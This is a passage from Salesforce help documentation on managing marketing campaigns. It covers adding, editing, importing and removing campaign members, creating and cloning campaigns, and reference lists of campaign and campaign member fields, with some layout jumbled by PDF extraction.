1. View the detail page of an opportunity.
2. Click Edit next to the campaign you want to edit in the Campaign Influence related list.
3. Optionally select or deselect the Primary Campaign Source checkbox.
4. Click Save.

To delete influential campaigns:

1. View the detail page of an opportunity.
2. Click Del next to the campaign you want to delete in the Campaign Influence related list.
3. Click OK.

See Also:
What is Campaign Influence?
Configuring Campaign Influence

Managing Campaign Members

Managing Campaign Members

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Campaign members are created from lead, contact, or person account records. Salesforce provides a variety of ways in which
you can manage your campaign members. You can add and update up to 50,000 campaign members at a time through lead,
contact, and person account reports; you can search for and add or edit multiple leads and contacts from the Manage Members
page; you can add an unlimited number of leads and contacts using a CSV import file; or you can add members to a campaign
one at a time from contact or lead detail pages.

Adding Campaign Members

You can add new members to a campaign:

• Individually from the Campaign History related list on a contact, lead, or person account detail page
• By searching for contacts and leads from the  Manage Members page
• From a campaign, contact, person account, or lead report
• From a list view of existing contacts or leads
• From a CSV import file of new leads
• From a CSV import file of existing members
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Note: If a campaign has a campaign member type, you must have access to that campaign member type in order to
add members to the campaign. Otherwise, you can only update existing campaign members.

Editing Campaign Members

You can edit the details of existing campaign members:

• Campaign History related list on a contact, lead, or person account detail page
• From the Campaign Members related list on a campaign detail page
• From the Manage Members page

Updating the Status of Existing Campaign Members

You can update the status of existing campaign members:

• From the Campaign History related list on a contact, lead, or person account detail page
• From the Manage Members page
• From a campaign, contact, person account, or lead report
• From a CSV import file of existing members

Removing Campaign Members

You can remove members of a campaign:

• From the Campaign History related list on a contact, lead, or person account detail page
• From the Campaign Members related list on a campaign detail page
• From the Manage Members page

Example Uses

• Create follow-up campaigns—Search for a custom list view of contacts or leads that is restricted to an earlier campaign
and a certain member status, such as “Attended”. Then add items from the generated list to a follow-up campaign. See
Adding Contacts or Leads from a List View to a Campaign on page 946.

• Leverage reporting functionality—Customize a standard report or build a new custom report that returns a list of contacts,
person account, or leads that you want to target. With the click of a button, you can add the entire list to a campaign. See
Add Campaign Members from Reports on page 944.

See Also:
Using the Campaign Members Related List
Campaigns FAQ

938

Setting Up Campaign HierarchiesCampaigning and Generating Leads



Editing Multiple Campaign Members

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on campaigns

AND

“Read” on leads or contacts

AND

Marketing User checked in your user information

To view the Existing Members tab:

“Edit” on campaigns

AND

“Edit” on leads and contacts

AND

Marketing User checked in your user information

To update and remove campaign members:

Editing Campaign Members from the Manage Members Page

Note:  Before using the Manage Members page, verify that you are using a supported browser.

To update the campaign member status, edit campaign member details, or remove campaign members from the Manage
Members page:

1. Click Manage Members and choose Edit Members - Search from the drop-down button on a campaign detail page or
the Campaign Members related list on a campaign detail page.

2. On the Existing Members subtab, optionally enter filter criteria to find existing members and click Go!.

Note:  For campaigns with campaign members created from both leads and contacts, you must have “Read”
permission on leads and contacts to see all members. If you only have “Read” on leads, you will only see campaign
members created from leads; if you only have “Read” on contacts, you will only see campaign members created
from contacts.

3. Select the checkboxes next to the records you want to edit. To select all records on the current page, select the checkbox
in the header row.

4. Optionally perform the following actions:

• To change the campaign member status, select a status from the Update Status drop-down list.
• To remove a member from a campaign, click Remove.
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• To edit the details of a campaign member, click Edit. Fields derived from the lead or contact record can only be edited
on the lead or contact detail page. The Campaign Member Type field can only be edited on the campaign detail
page.

• To view, edit, delete, clone, a campaign member, click the campaign member's name in the Name column.

The latest Manage Members page is not available in accessibility mode. In accessibility mode, you can still add contacts or
leads to a campaign, update campaign members, and remove campaign members using the campaign member wizards.

See Also:
Using the Campaign Members Related List
Adding Multiple Campaign Members
Displaying and Editing a Campaign Member

Using the Campaign Members Related List

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Read” on campaigns

AND

“Read” on leads or contacts

To view the campaign members related list:

“Read” on campaigns

AND

“Read” on leads or contacts

To edit the campaign members related list:

“Edit” on campaigns

AND

“Read” on leads or contacts

AND

Marketing User checked in your user information

To view and use the Manage Members button on the
campaign members related list:

With the Campaign Members related list, you can view, add, edit, or remove campaign members directly from a campaign
detail page.

The Campaign Members related list displays five campaign members by default. To display more members, click the Show
more link.
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Note:  For campaigns with campaign members created from both leads and contacts, you must have “Read” permission
on leads and contacts to see all members. If you only have “Read” on leads, you will only see campaign members
created from leads; if you only have “Read” on contacts, you will only see campaign members created from contacts.

The Manage Members drop-down button in the Campaign Members related list and in the campaign detail section lets you
search for leads and contacts and add them as campaign members, update or remove existing members, and add and update
campaign members using an import file.

From the Campaign Members related list:

• Click the campaign member's name in the Name, First Name, or Last name column to view the campaign member details.

• Click Remove to remove a campaign member from the campaign.

• Click Edit to edit the campaign member details.

• Select one of the following from the Manage Members drop-down button:

◊ Add Members - Search to add campaign members from a search.

◊ Add Members - Import File to add campaign members by importing leads from a comma-delimited text file (.csv).

◊ Edit Members - Search to view, update, or delete existing campaign members.

◊ Update & Add Members - Import File to edit campaign member status using an import file.

See Also:
Adding Multiple Campaign Members
Editing Multiple Campaign Members
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Adding Multiple Campaign Members

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on campaigns

AND

“Edit” on leads and contacts

AND

Marketing User checked in your user information

To add campaign members:

“Read” on campaigns

AND

“Edit” on leads or contacts

To remove campaign members:

Adding Campaign Members from the Manage Members Page

You can add leads and contacts as members of a campaign from the Manage Members page. To add contacts to a campaign,
the Add to Campaign checkbox must be enabled. If a campaign has a campaign member type, you must have access to that
campaign member type in order to add members to the campaign. Otherwise, you can only update existing campaign members.

Note:  Before using the Manage Members page, verify that you are using a supported browser.

To add campaign members from the Manage Members page:

1. Click Manage Members and choose Add Members - Search from the drop-down button on a campaign detail page or
the Campaign Members related list.

2. On the Add Members subtab, select the Leads or Contacts radio button to add leads or contacts, respectively.
3. Search for leads or contacts:

• You can specify search filters and click Go!
• Alternatively, you can select an existing view, such as all open leads, from the Use Existing View drop-down list. Your

results will display automatically. If you select an existing view, you can modify its criteria by adding or changing filters,
and clicking Go!.

Note:  You cannot modify filter criteria if you selected a view that uses advanced options or that uses more
than five filters. Filter criteria will be reflected in your search results for these views, though not all filter criteria
will display.

4. Select the checkboxes next to the records you want to add. To select all records on the current page, select the checkbox
in the header row.

5. Select a status from the Add with Status drop-down list.
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A confirmation message will display and you will see the members you added on the Existing Members subtab.

Note:  If you are unable to add contacts, enable the Add to Campaign checkbox:

1. From Setup, click Customize > Contacts > Search Layouts.
2. Click Edit next to Contacts List View.
3. Select Add to Campaign.
4. Click Save.

The latest Manage Members page is not available in accessibility mode. In accessibility mode, you can still add contacts or
leads to a campaign, update campaign members, and remove campaign members using the campaign member wizards.

See Also:
Using the Campaign Members Related List
Editing Multiple Campaign Members
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Add Campaign Members from Reports

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on contacts

AND

“Read” on reports

To add campaign members from a contact report:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on leads

AND

“Read” on reports

To add campaign members from a lead report:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Read” on contacts

AND

“Read” on reports

To add campaign members from a person account report:

To add leads, contacts, or person accounts from a report to a campaign:

1. Click Add to Campaign from a campaign, contact, lead, or person account report that returns lead, contact, or person
account records.

Tip:  You must have sharing access to view the lead or contact you are adding.
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If your report returns more than 50,000 records, the button will be disabled. You can modify your report to return fewer
records.

2. Use the lookup icon to choose a campaign to which the report results will be added.
3. Choose a member status for the contacts, leads, or person accounts you are adding to the campaign.
4. Choose whether or not to override the member status of members who already exist in the campaign.

If you choose to override the status of existing campaign members, you will be updating their member statuses to whatever
value you selected in the previous step.

5. Click Add to Campaign.
6. Review the confirmation screen.
7. Click Done to return to the report.

Note:  You can add campaign members directly from a tabular, summary, or matrix report, but not from a joined
report.

Consider the following additional tips when adding campaign members from a report:

• Campaign members are added in batches, so in the event that the process is interrupted, for example, by clicking Cancel,
some members will still be added.

• If lead or contact records are edited after you click Add to Campaign but before they are actually added, they will not be
added to the campaign.

• You cannot add converted leads to campaigns. If any converted leads are included in a report, they will be ignored during
the add to campaign process.

• If a campaign has a campaign member type, you must have access to that campaign member type in order to add members
to the campaign. Otherwise, you can only update existing campaign members.

See Also:
Managing Campaign Members
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Adding Contacts or Leads from a List View to a Campaign

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Edit” on contacts

To add multiple existing contacts to a campaign:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Edit” on leads

To add multiple existing leads to a campaign:

Marketing User checked in your user information

AND

“Edit” on campaigns

AND

“Edit” on contacts

To add multiple person accounts to a campaign:

To add existing contacts, leads, or person accounts to a campaign from a list view:

1. Navigate to a list view of contacts or leads, such as the “My Contacts” list view. You can create custom list views that restrict
results according to campaign name and optionally also by campaign member status.

Tip:  You must have sharing access to view the lead or contact you are adding.

Note that person accounts are included in contact list views and can be added to campaigns from them.

2. Check the boxes next to the records you want to select. Optionally, check the box in the column header to select all currently
displayed items. Up to 250 records can display on the page at a time.

3. Click Add to Campaign. If a campaign has a campaign member type, you must have access to that campaign member
type in order to add members to the campaign. Otherwise, you can only update existing campaign members.

4. In the first step of the wizard, enter the name of the campaign you want to update, or click the lookup icon to search for
and select an existing campaign.

5. Choose whether or not to override the member status of members who already exist in the campaign.
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If you choose to override the status of existing campaign members, you will be updating their member statuses to whatever
value you selected in the previous step.

6. Click Add to Campaign.
7. In the second step of the wizard, review confirmation messages about the members you selected. If a selected member

already existed in the campaign, then its member status value will have been updated.
8. Click Done to exit the wizard and return to the list view.

See Also:
Managing Campaign Members

Displaying and Editing a Campaign Member

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaigns

AND

“Read” on leads

AND

“Read” on contacts

To view, edit, or remove campaign members:

“Read” on campaigns

AND

“Edit” on leads

AND

“Edit” on contacts

To add campaign members:

From the campaign member detail page, you can edit, delete, or clone a campaign member record. Additionally, if the campaign
member is based on a lead, you can convert the lead; if the campaign member is based on a contact, you can create an opportunity.

To view the campaign member detail page, click the campaign member's name in the Name, First Name, or Last Name
columns on the Campaign Members related list on a campaign detail page or on the Existing Members tab.

Note:  To view a campaign member, you must have permissions on the campaign and the lead or contact. For example,
to view a campaign member created from a lead, you must be able to view both the campaign and the lead.

To edit the campaign member detail page layout, click the Edit Layout link or from Setup, click Customize > Campaigns >
Campaign Member > Page Layouts.
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Editing a Campaign Member

To edit a campaign member, click Edit on the campaign member detail page, change the fields you want to update,
then click Save. Fields derived from the contact or lead can only be edited from the lead or contact detail pages.

Note:  If your administrator has enabled inline editing for your organization, you cannot use inline editing on
the Status drop-down list on the campaign member detail page. Instead, click Edit on the campaign detail
page to edit the Status drop-down list.

Cloning a Campaign Member

To clone a campaign member, click Clone on the campaign member detail page, then select a campaign and a contact
or lead. Change the fields you want to clone for the new campaign member, then click Save.

Deleting a Campaign Member

To delete a campaign member, click Delete on the campaign member detail page.

Note:  Deleting a campaign member record is permanent; the record is not recoverable from the recycle bin.
However, the original lead or contact record is not deleted.

Converting a Lead

If the campaign member was created from a lead, you can click Convert Lead on the campaign member detail page to
convert the lead. When you convert a lead, the campaign member is still a part of the campaign, but its type changes
from lead to contact.

Creating an Opportunity

If the campaign member was created from a contact, you can click Create Opportunity on the campaign member detail
page to create an opportunity. When you create an opportunity, the campaign member is still a part of the campaign.

See Also:
Adding, Editing, or Cloning Individual Campaign Members
Campaign Member Fields

Campaign Member Fields

The available fields vary according to which Salesforce Edition you have.

These are the fields (in alphabetical order) that make up a campaign member. Most campaign member fields are derived from
the lead or contact record from which the campaign member was created and must be edited from the corresponding lead or
contact record. Some of these fields may not be visible or editable depending on your page layout and field-level security
settings.
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DescriptionField

The campaign to which the lead or contact belongs.Campaign

The default currency for currency amount fields on the campaign member. Amounts
display in the campaign member currency and are also converted to the user’s personal
currency. Available only for organizations that use multiple currencies.

Campaign Member Currency

The record type of the campaign member, which determines the page layout available for
the campaign member. (Read only)

Campaign Member Type

City portion of the lead or contact's address.City

The company, if the campaign member is based on a lead, or the account, if the campaign
member is based on a contact.

Company (Account)

The name of the contact, if the campaign member is based on a contact.Contact

Country portion of the lead or contact’s address.Country

The country for the address. Entry is selected from a picklist of standard values.Country (beta)

User who created the campaign member. (Read only)Created By

Date the campaign member was created. (Read only)Created Date

Description of the lead or contact.Description

Indicates that the contact does not want to be contacted by phone. If you use Data.com,
the Phone field value will be masked out in search results and on the Contact Card, and
it will be blank in .csv files created when you export records.

Do Not Call

Email address of the lead or contact.Email

Indicates that the contact does not want to receive email.  If you use Data.com, the Email
field value will be masked out in search results and on the Contact Card, and it will be
blank in .csv files created when you export records.

Email Opt Out

Fax number of the lead or contact.Fax

Indicates if the person has requested not to be included in broadcast faxes.Fax Opt Out

First name of the lead or contact.First Name

Date the campaign member first responded. (Read only)First Responded Date

User who last changed the campaign member record. (Read only)Last Modified By

Date the campaign member record was last modified. (Read only)Last Modified Date

Last name of the lead or contact.Last Name

The name of the lead, if the campaign member is based on a lead.Lead

Source of lead, for example, Advertisement, Partner, or Web. Entry is selected from a
picklist of available values, which are set by an administrator. Each picklist value can have
up to 40 characters.

Lead Source

Mobile phone number for the lead or contact.Mobile

Phone number for the lead or contact.Phone
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DescriptionField

Indicates if the campaign member has responded.Responded

The salutation for addressing the person, for example, Mr., Ms., Dr., or Prof.Salutation

State or province portion of the lead or contact’s address.State/Province

The state or province for the address. Entry is selected from a picklist of standard values.State/Province (beta)

The status of the campaign member, for example, sent or responded.Status

Street portion of the lead or contact's address.Street

The title of the lead or contact, for example, President.Title

Zip or postal code portion of the lead or contact's address.Zip/Postal Code

See Also:
Displaying and Editing a Campaign Member
Adding Multiple Campaign Members

Adding, Editing, or Cloning Individual Campaign Members

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaigns

AND

“Edit” on leads and contacts

To add or clone a campaign member:

“Read” on campaigns

AND

“Read” or “Edit” on leads or contacts

To edit a lead or contact campaign member:

“Read” on campaigns

AND

“Read” or “Edit” on accounts and contacts

To edit person account campaign member:

For campaigns that elicit responses one-by-one, for example, via a phone call to a sales rep, you can manually link a contact,
lead, or person account to a campaign and update that individual's campaign status. Any user can do this from the Campaign
History related list on a contact, lead, or person account.
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You can also add multiple campaign members and edit multiple campaign members.

Note: If a campaign has a campaign member type, you must have access to that campaign member type in order to
add members to the campaign. Otherwise, you can only update existing campaign members.

Adding Individual Campaign Members

To add a campaign member:

1. Click Add to Campaign in the Campaign History related list on the detail page of the contact, lead, or person account
you want to add to the campaign.

2. In the popup window, specify the campaign.
3. On the Campaign Member Edit page, specify the campaign member status.
4. Enter or change any additional information.

Fields derived from the lead or contact record can only be edited on the lead or contact detail page. The Campaign
Member Type field can only be edited on the campaign detail page.

5. Click Save.

Editing Individual Campaign Members

To edit a campaign member:

1. Find an existing campaign member:

• Click Edit next to the campaign name in the Campaign History related list on the detail page of a contact, lead, or
person account

• Click Edit next to the campaign member's name in the Campaign Members related list on the detail page of a campaign

2. Enter or change any additional information.

Fields derived from the lead or contact record can only be edited on the lead or contact detail page. The Campaign
Member Type field can only be edited on the campaign detail page.

3. Click Save.

Cloning Individual Campaign Members

To clone a campaign member:

1. Click a campaign member's name in the Name, First Name, or Last Name columns in the Campaign Members related
list of the detail page of a campaign.

2. Click Clone.
3. In the popup window, specify a campaign.
4. On the Campaign Member Edit page, specify either a lead or a contact; do not specify both.
5. Enter or change any additional information.

Fields derived from the lead or contact record can only be edited on the lead or contact detail page. The Campaign
Member Type field can only be edited on the campaign detail page.

6. Click Save.
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Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Managing Campaign Members

Importing Campaign Members

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on campaigns

AND

Marketing User checked in your user information

To change campaigns:

“Edit” on campaigns

AND

Marketing User checked in your user information

AND

“Import Leads”

To import leads as campaign members:

“Edit” on campaigns

AND

Marketing User checked in your user information

AND

“Import Leads”

AND

“Read” on contacts

To use the campaign update wizard:

With the two campaign import wizards, designated Marketing Users can use CSV (comma-separated values) files to import
new leads and track the responses of leads and contacts at each stage of a campaign.

For example, you can mark each contact or lead as “Planned” at the beginning of the campaign and then mark them as
“Responded” after they respond. These different “responses” are referred to as the Member Status of each lead or contact
associated with the campaign.
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Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

To use one of the import wizards, click the Manage Members drop-down button on a campaign detail page and select one
of the following:

• Add Members - Import File then click Import Leads: With the Lead Import Wizard, you can import a list of new names.
Salesforce creates leads in the system, and associates those leads with your campaign to create new campaign members.

• Update & Add Members - Import File then click Update & Add Campaign Members: With the Campaign Update
Wizard, you can import a list of existing Salesforce contacts and leads. Salesforce associates the records with your existing
campaign member records, and updates their response history. In addition, any new leads or contacts added using the
Campaign Update Wizard will be added as members of the campaign.

Note: If a campaign has a campaign member type, you must have access to that campaign member type in order to
add members to the campaign. Otherwise, you can only update existing campaign members.

See Also:
Managing Campaign Members
Adding, Editing, or Cloning Individual Campaign Members

Lead Import Wizard

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on campaigns

AND

Marketing User checked in your user information

AND

“Import Leads”

To import leads using the campaign import wizard:

With the Lead Import Wizard, you can import a list of up to 50,000 new leads and associate them with a campaign. Use this
wizard for campaigns that generate new leads.

Example Uses

• If you buy a list of names for a direct mailing, you can import the list to create new leads and associate them with your
direct mail campaign.

• If you have a list of individuals who visited your booth at a trade show, you can import the list to create new leads and
mark them as “Attended”.
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Tips for Using the Lead Import Wizard

• If names in your import file match existing leads, duplicate leads are created.
• If duplicate names exist in the import file, duplicate leads are created.
• If a campaign has a campaign member type, you must have access to that campaign member type in order to add members

to the campaign. Otherwise, you can only update existing campaign members.

Using the Lead Import Wizard

1. Prepare your list of names according to the specifications for mapping fields in your lead import file.
2. Click the Manage Members drop-down button and select Add Members - Import File on the detail page of the campaign

you want to update.
3. Click Import Leads.
4. Click Browse and choose your import file.
5. Select a lead source.
6. Select an assignment rule to assign the leads.
7. Optionally choose to use assignment rule settings to notify the new record owners.
8. Select the default member status for leads with blank or invalid statuses.
9. Select the character encoding of your import file. Most users do not need to change the default setting.
10. Optionally choose to trigger workflow rules for new and updated records.
11. Optionally choose to trigger workflow rules for new campaign members.
12. Click Next.
13. Map the Salesforce fields to the fields in your import file, then click Next.
14. Map the Salesforce campaign member status field and any campaign member custom fields to your import file, then click

Next. This is only available if you have campaign member custom fields.
15. Click Import Now!.

To verify that leads were imported with the correct member status, view the Campaign History related list on the leads. See
Adding, Editing, or Cloning Individual Campaign Members on page 950.

See Also:
Importing Campaign Members
Managing Campaign Members
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Campaign Update Wizard

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on campaigns

AND

“Import Leads”

AND

“Read” on contacts

Marketing User checked in your user information

To use the Campaign Update Wizard:

With the Campaign Update Wizard, you can import up to 50,000 existing contacts and leads to update the statuses for
campaign members. Use this wizard for campaigns that target existing leads or contacts.

Example Uses

• For a Web seminar targeted at existing leads, you can import a list of those leads with their member statuses for the
campaign, for example, “Attended,” “Registered,” and “No Show.”

• For a conference targeted at existing contacts, you can import a list of contacts to track your customers' attendance.

Tips for Using the Campaign Update Wizard

• Campaign members based on contacts created from converted leads are not updated.
• If the import file includes leads or contacts that are not campaign members, they are added as campaign members.
• The campaign update wizard only changes records to which you have sharing access. Additionally, the campaign update

wizard only updates child campaigns if you have at least “Read” access on the parent.
• If a campaign has a campaign member type, you must have access to that campaign member type in order to add members

to the campaign. Otherwise, you can only update existing campaign members.

Using the Campaign Update Wizard

1. Run a contact or lead report in Salesforce, include the Contact ID or Lead ID field, and export it to Excel.

If you are targeting both leads and contacts, combine the exported lead and contact reports into one CSV (comma-separated
values) file in Excel. Make sure the Lead ID and Contact ID values are in the same Excel column.

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

2. Rename the Lead ID/Contact ID column to Record Id.
3. Optionally add a column called Status, and enter the member status for each record. Records with blank or invalid

statuses are assigned the default member status you select in the wizard.
4. Click the Manage Members drop-down button and select Update & Add Members - Import File on the campaign you

want to update.
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5. Click Update & Add Campaign Members.
6. Click Browse and choose your import file.
7. Select the default member status for contacts or leads with blank or invalid statuses.
8. Select the character encoding of your import file. Most users do not need to change the default setting.
9. Optionally choose to trigger workflow rules for new and updated records.
10. Click Next.
11. Map the Salesforce fields to the fields in your import file, then click Next. Campaign member custom field mapping is

available if you have campaign member custom fields.
12. Click Import Now!.

See Also:
Managing Campaigns

Creating Campaigns

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on campaignsTo view campaigns:

“Create” on campaigns

AND

Marketing User checked in your user information

To create campaigns:

To create a campaign:

1. Select Campaign from the Create New drop-down list in the sidebar or click New next to Recent Campaigns on the
campaigns home page.

2. Choose the following, then click Continue:

• A campaign record type, which determines the page layout and picklist values for the campaign
• A campaign member type, which determines the page layout for members of the campaign

Note:  These options are only available if your organization has two or more campaign record types or campaign
member record types, respectively. To skip this step, set up default record types.

3. Enter information for the campaign.
4. Click Save, or click Save & New to save the campaign and add another.
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Note:  New campaigns have two default member status values: “Sent” and “Responded”. You can edit them or create
new ones as needed.

See Also:
Campaign Fields

Cloning Campaigns

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on campaigns

AND

Marketing User checked in your user information

To clone campaigns:

The Clone button on a campaign creates a new campaign with the same information and member status values as an existing
campaign.

1. Click Clone on a campaign.

Note:  If your organization uses record types, and the campaign you're cloning doesn't have a campaign member
type, or has an invalid campaign member type, select campaign member type and click Continue.

2. Enter or change any information for the new campaign.
3. Click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Campaign Fields
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Campaign Fields

Available in: Professional, Enterprise, Unlimited, and Developer Editions

A campaign has the following fields, listed in alphabetical order. Depending on your page layout and field-level security
settings, some fields may not be visible or editable.

DescriptionField

Checkbox to mark whether the campaign is active or not.Active

Amount of money spent to run the campaign.Actual Cost

Amount of money budgeted for the campaign.Budgeted Cost

The default currency for currency amount fields in the
campaign. Amounts display in the campaign currency and are

Campaign Currency

also converted to the user’s personal currency. Available only
for organizations that use multiple currencies.

Record type for campaign members; determines the page
layout of the members of the campaign. Available in
Enterprise, Unlimited, and Developer Editions.

Campaign Member Type

Identifying name for the campaign.Campaign Name

Assigned owner of the campaign.Campaign Owner

Record type for the campaign; determines the picklist values
available for the campaign. Available in Enterprise, Unlimited,
and Developer Editions.

Campaign Record Type

Number of leads that were converted to accounts due to the
marketing efforts in the campaign. Salesforce automatically

Converted Leads

calculates this amount using all associated records regardless
of whether you have read access to them. For more information
on converting leads, see Converting Leads on page 1004. This
field cannot be referenced in formulas for workflow rules,
validation rules, field updates, or approval processes, but it can
be referenced in custom formula fields. Updates to this field
do not trigger workflow rules.

User who created the campaign including creation date and
time. (Read only)

Created By

Listing of custom links for campaigns as set up by your
administrator.

Custom Links

Description of the campaign. Up to 32KB of data are allowed
in this field. Only the first 255 characters display in reports.

Description
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DescriptionField

Ending date for the campaign. Responses received after this
date are still counted.

End Date

Percentage of responses you expect to receive for the campaign.Expected Response (%)

Amount of money you expect to generate from the campaign.Expected Revenue

User who last changed the campaign fields, including
modification date and time. This does not track changes made
to any of the related list items on the campaign. (Read only)

Last Modified By

Calculated field for number of opportunities associated with
the campaign. (Read only) Salesforce automatically calculates

Num Total Opportunities

this amount using all associated records regardless of whether
you have read access to them. This field cannot be referenced
in formulas for workflow rules, validation rules, field updates,
or approval processes, but it can be referenced in custom
formula fields. Updates to this field do not trigger workflow
rules.

Number of individuals targeted by the campaign. For example,
the number of emails sent.

Num Sent

Calculated field for number of closed/won opportunities
associated with the campaign. (Read only) Salesforce

Num Won Opportunities

automatically calculates this amount using all associated records
regardless of whether you have read access to them. This field
cannot be referenced in formulas for workflow rules, validation
rules, field updates, or approval processes, but it can be
referenced in custom formula fields. Updates to this field do
not trigger workflow rules.

The campaign above the selected campaign in the campaign
hierarchy.

Parent Campaign

Starting date for the campaign.Start Date

Status of the campaign, for example, Planned, In Progress.
Entry is selected from a picklist of available values, which are

Status

set by an administrator. Each picklist value can have up to 40
characters.

Calculated field for the total amount of money spent to run a
campaign hierarchy. (Read only) Salesforce automatically

Total Actual Cost in Hierarchy

calculates this amount using all associated records regardless
of whether you have read access to them. This field cannot be
referenced in formulas for workflow rules, validation rules,
field updates, or approval processes, but it can be referenced
in custom formula fields. Updates to this field do not trigger
workflow rules.
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Calculated field for the total amount of money budgeted for
a campaign hierarchy. (Read only) Salesforce automatically

Total Budgeted Cost in Hierarchy

calculates this amount using all associated records regardless
of whether you have read access to them. This field cannot be
referenced in formulas for workflow rules, validation rules,
field updates, or approval processes, but it can be referenced
in custom formula fields. Updates to this field do not trigger
workflow rules.

Number of individuals on accounts that are associated with
the campaign. Salesforce automatically calculates this amount

Total Contacts

using all associated records regardless of whether you have
read access to them. This field cannot be referenced in
formulas for workflow rules, validation rules, field updates, or
approval processes, but it can be referenced in custom formula
fields. Updates to this field do not trigger workflow rules.

Calculated field for number of contacts associated with the
campaign hierarchy. (Read only) Salesforce automatically

Total Contacts in Hierarchy

calculates this amount using all associated records regardless
of whether you have read access to them. This field cannot be
referenced in formulas for workflow rules, validation rules,
field updates, or approval processes, but it can be referenced
in custom formula fields. Updates to this field do not trigger
workflow rules.

Calculated field for the total number of leads associated with
the campaign hierarchy that were converted into accounts,

Total Converted Leads in Hierarchy

contacts, and opportunities. Salesforce automatically calculates
this amount using all associated records regardless of whether
you have read access to them. This field cannot be referenced
in formulas for workflow rules, validation rules, field updates,
or approval processes, but it can be referenced in custom
formula fields. Updates to this field do not trigger workflow
rules.

Calculated field for the total amount of money you expect to
generate from a campaign hierarchy. (Read only) Salesforce

Total Expected Revenue in Hierarchy

automatically calculates this amount using all associated records
regardless of whether you have read access to them. This field
cannot be referenced in formulas for workflow rules, validation
rules, field updates, or approval processes, but it can be
referenced in custom formula fields. Updates to this field do
not trigger workflow rules.

Number of potential opportunities (leads) associated with the
campaign. Salesforce automatically calculates this amount

Total Leads

using all associated records regardless of whether you have
read access to them. This field cannot be referenced in
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formulas for workflow rules, validation rules, field updates, or
approval processes, but it can be referenced in custom formula
fields. Updates to this field do not trigger workflow rules.

Calculated field for the total number of leads associated with
the campaign hierarchy. This number also includes converted

Total Leads in Hierarchy

leads. (Read only) Salesforce automatically calculates this
amount using all associated records regardless of whether you
have read access to them. This field cannot be referenced in
formulas for workflow rules, validation rules, field updates, or
approval processes, but it can be referenced in custom formula
fields. Updates to this field do not trigger workflow rules.

Calculated field for the total number of individuals targeted
by a campaign hierarchy, for example, the number of emails

Total Num Sent in Hierarchy

sent. (Read only) Salesforce automatically calculates this
amount using all associated records regardless of whether you
have read access to them. This field cannot be referenced in
formulas for workflow rules, validation rules, field updates, or
approval processes, but it can be referenced in custom formula
fields. Updates to this field do not trigger workflow rules.

Calculated field for the total number of opportunities
associated with the campaign hierarchy. (Read only) Salesforce

Total Opportunities in Hierarchy

automatically calculates this amount using all associated records
regardless of whether you have read access to them. This field
cannot be referenced in formulas for workflow rules, validation
rules, field updates, or approval processes, but it can be
referenced in custom formula fields. Updates to this field do
not trigger workflow rules.

Calculated field for the total number of contacts and
unconverted leads that have a Member Status equivalent to

Total Responses

“Responded” for the campaign. (Read only) Salesforce
automatically calculates this amount using all associated records
regardless of whether you have read access to them. This field
cannot be referenced in formulas for workflow rules, validation
rules, field updates, or approval processes, but it can be
referenced in custom formula fields. Updates to this field do
not trigger workflow rules.

Calculated field for number of contacts and unconverted leads
that have a Member Status equivalent to “Responded” for

Total Responses in Hierarchy

the campaign hierarchy. (Read only) Salesforce automatically
calculates this amount using all associated records regardless
of whether you have read access to them. This field cannot be
referenced in formulas for workflow rules, validation rules,
field updates, or approval processes, but it can be referenced
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DescriptionField

in custom formula fields. Updates to this field do not trigger
workflow rules.

Calculated field for the amount of all opportunities associated
with the campaign, including closed/won opportunities. (Read

Total Value Opportunities

only) Salesforce automatically calculates this amount using all
associated records regardless of whether you have read access
to them.

For organizations using multiple currencies, opportunity
amounts are converted to the campaign currency. If your
currency does not match the campaign currency, the amount
is converted to your currency and displays in parentheses.

For organizations using advanced currency management,
opportunity amounts are converted to the campaign currency
via dated exchange rates. If the campaign currency does not
match your currency, the total of the opportunity amounts are
converted using standard exchange rates, not dated exchange
rates, and that amount displays in parentheses.

This field cannot be referenced in formulas for workflow rules,
validation rules, field updates, or approval processes, but it can
be referenced in custom formula fields. Updates to this field
do not trigger workflow rules.

Calculated field for total amount of all opportunities associated
with the campaign hierarchy, including closed/won

Total Value Opportunities in Hierarchy

opportunities. (Read only) Salesforce automatically calculates
this amount using all associated records regardless of whether
you have read access to them.

All campaigns in a hierarchy must use the same currency.

For organizations using multiple currencies, opportunity
amounts are converted to the campaign currency. If your
currency does not match the campaign currency, the amount
is converted to your currency and displays in parentheses.

For organizations using advanced currency management,
opportunity amounts are converted to the campaign currency
via dated exchange rates. If the campaign currency does not
match your currency, the total of the opportunity amounts are
converted using standard exchange rates, not dated exchange
rates, and that amount displays in parentheses.

Calculated field for amount of all closed/won opportunities
associated with the campaign. (Read only) Salesforce

Total Value Won Opportunities

automatically calculates this amount using all associated records
regardless of whether you have read access to them.
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For organizations using multiple currencies, opportunity
amounts are converted to the campaign currency. If your
currency does not match the campaign currency, the amount
is converted to your currency.

For organizations using advanced currency management,
opportunity amounts are converted to the campaign currency
via dated exchange rates. If the campaign currency does not
match your currency, the total of the opportunity amounts are
converted using standard exchange rates, not dated exchange
